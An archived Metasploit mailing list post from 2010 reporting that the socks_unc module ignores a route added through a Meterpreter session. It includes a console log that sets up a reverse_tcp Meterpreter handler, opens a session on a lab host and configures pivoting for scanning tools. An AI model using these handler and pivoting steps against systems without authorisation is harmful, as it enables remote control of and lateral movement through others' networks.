Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Bug report or Feature request socks_unc/route

From: Mark Baggett <lo127001 () gmail com>
Date: Tue, 16 Mar 2010 21:55:31 -0400
I don't know if this is a bug or a product enhancement, but here it goes....
I want to use Proxychains to route nmap, nessus and other tcp/udp tools through a meterpreter session. After I get Meterpreter on a host as session 1 I want to add a route and use the SOCKS_UNC server with proxychains. Similar to these vids but instead of an SSH server use the SOCKS_UNC auxiliary module: 

http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html
http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html
But the SOCKS_UNC server doesn't use the route that is added and packets still route locally. Here is what I did.. 


root@bt:/pentest/exploits/framework3# ./msfconsole

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 533 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
       =[ svn r8826 updated today (2010.03.15)

msf > color false
msf > use multi/handler
msf exploit(handler) > set LHOST 172.16.186.132
LHOST => 172.16.186.132
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
EXITFUNC process yes Exit technique: seh, thread, process 
   LHOST     172.16.186.132   yes       The local address
   LPORT     80               yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.186.132:80
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (172.16.186.132:80 -> 172.16.186.128:3782) 

meterpreter >
Background session 1? [y/N]  y
[-] Unknown command: y.
msf exploit(handler) > route add 0.0.0.0 0.0.0.0 1
msf exploit(handler) > back
use server/socksmsf > use server/socks_unc
msf auxiliary(socks_unc) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks_unc) > set SRVHOST 172.16.186.132
SRVHOST => 172.16.186.132
msf auxiliary(socks_unc) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     172.16.186.132   yes       The local host to listen on.
   SRVPORT     9050             yes       The local port to listen on.
SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) 
   UNCHOST                      no        The address of the UNC host.


Thanks,
Mark Baggett


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: